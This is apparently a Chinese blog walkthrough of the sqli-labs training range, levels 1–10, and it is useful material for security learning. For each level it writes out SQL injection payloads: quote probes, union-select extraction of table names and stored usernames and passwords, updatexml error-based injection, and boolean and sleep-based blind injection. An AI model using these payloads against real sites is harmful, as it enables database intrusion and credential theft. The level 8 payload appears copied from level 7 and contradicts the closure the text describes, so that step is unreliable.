sqli-lab靶场通关

文章目录

less-1

1、提示输入参数id,且值为数字;

2、判断是否存在注入点

php 复制代码
	id=1'

报错,说明存在 SQL注入漏洞。

3、判断字符型还是数字型

php 复制代码
	id=1 and 1=1 --+
	id=1 and 1=2 --+
	id=1" --+

注意,注释#可能没有--+好使

两次页面返回均正常,说明为字符型注入。

下面判断闭合类型:

也可以从报错的地方看出是单引号闭合。

可以看出是单引号闭合。

综上,该关卡属于字符型注入,且闭合符号为单引号。

4、判断字段数

php 复制代码
	id=1' order by 3 --+

字段数为三,也就是说sql查询的结果中,有三列数据。

5、查看回显点

php 复制代码
	id=-1' union select 1,2,3 --+

注意:要确保union select前面的语句,也就是id在数据库中是不存在的,才会看到回显点。

6、查看数据库名

php 复制代码
	id=-1' union select 1,(select database()),3 --+

可以得到数据库名为security.

7、查看表名

php 复制代码
	id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

可以看出security表中,有四张表。

8、查看字段名

php 复制代码
	id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

9、查看字段值

php 复制代码
	id=-1' union select 1,(select group_concat(concat(username,'%23',password)) from security.users),3 --+
复制代码
下面主要介绍思路,就不全流程走完了。

less-2

1、判断是否存在注入漏洞

php 复制代码
	id=1' 

说明存在SQL注入漏洞。

2、判断字符型还是数字型

php 复制代码
	id=1 and 1=1 --+
	id=1 and 1=2 --+


说明属于数字型注入。

3、判断字段数

php 复制代码
	id=1 order by 3 --+

>后面的步骤和前一关一样,在这里不在赘述。

less-3

1、用单引号判断是否存在sql注入。

说明存在sql注入漏洞。

2、判断字符型还是数字型

返回正常,说明属于字符型注入。

下面确定闭合符号:

从这里看出,后端代码是在id值后面加了'),再进行查询的。

所以,闭合符号为')


less-4

用单引号判断是否存在sql注入。

单引号不行,试试双引号,

说明存在SQL注入漏洞。单引号没反应,只能说明此处的闭合方式没用到单引号,试试其他符号。

从这里可以看出,闭合方式是双引号+单括号。最外面的那个单引号是为了区分其他无关报错信息。

less-5

用单引号判断是否存在SQL注入漏洞

可以看到,存在SQL注入漏洞,且闭合符号为单引号。

因为页面没有回显,所以,这里,我们不能用联合查询,需要用盲注。

可以看到,此处只有两种页面显示,可以使用布尔盲注;

因为有报错,所以也可以使用报错注入。

使用盲注,直接判断数据库长度

php 复制代码
	id=1' and length(database())=8 --+ //判断数据库名长度

说明当前数据库名的长度为8,这里就不演示布尔盲注,太麻烦了~盲注。

这里使用报错注入进行演示:

(1)查数据库名

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 

(2)查表名

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+ 

(3)查字段名

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 

(4)查字段值

php 复制代码
	id=1' and updatexml(1,concat(0x7e,(select group_concat(concat(username,'%23',password)) from security.users),0x7e),1) --+ 

注意:该语句对输出的字符长度也做了限制,其最长输出32位。

less-6

单引号判断是否存在sql注入漏洞;

单引号不行,双引号上,成了~

可以看出,只有双引号闭合,故试试:

既然有报错,那就用报错注入吧~

查数据库名

php 复制代码
	id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ 

后面就不多赘述了~

less-7

用单引号判断是否存在sql注入

页面返回不一样,所以存在SQL注入漏洞,但是没有报错也没有回显,只能使用盲注。

需要试试,出来闭合符号为'))

使用布尔盲注,直接判断数据库长度

php 复制代码
	id=1')) and length(database())=8 --+ //判断数据库名长度

less-8



通过单引号判断存在 sql注入漏洞;同时,发现闭合引号就是单引号。因为此处没有报错,也没有回显,只能用布尔盲注。

使用布尔盲注,直接判断数据库长度

php 复制代码
	id=1')) and length(database())=8 --+ //判断数据库名长度

less-9

这一关需要用时间盲注,payload:

php 复制代码
	id=1 and sleep(5) --+ //数字型则等待5秒
	id=1' and sleep(5) --+ //字符型则等待5秒

可知存在SQL注入漏洞,闭合符号为单引号,且类型属于时间盲注。

使用时间盲注,直接判断数据库长度

php 复制代码
	id=1' and if(length(database())=8,sleep(5),1) --+ //猜数据库名长度

数据库长度为8,后续就是一个一个字母猜数据库名,然后表名、字段名、字段内容,在这里不在赘述。

less-10

这一关与前一关得区别主要是,闭合符号换成了双引号,其余都一样。

相关推荐
黑客老李7 小时前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
玥轩_5217 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
薄荷椰果抹茶8 小时前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全
weixin_472339468 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li8 小时前
WebView安全实现(一)
android·安全·webview
weixin_472339468 小时前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
诗句藏于尽头15 小时前
完成ssl不安全警告
网络协议·安全·ssl
独行soc20 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘21 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)1 天前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全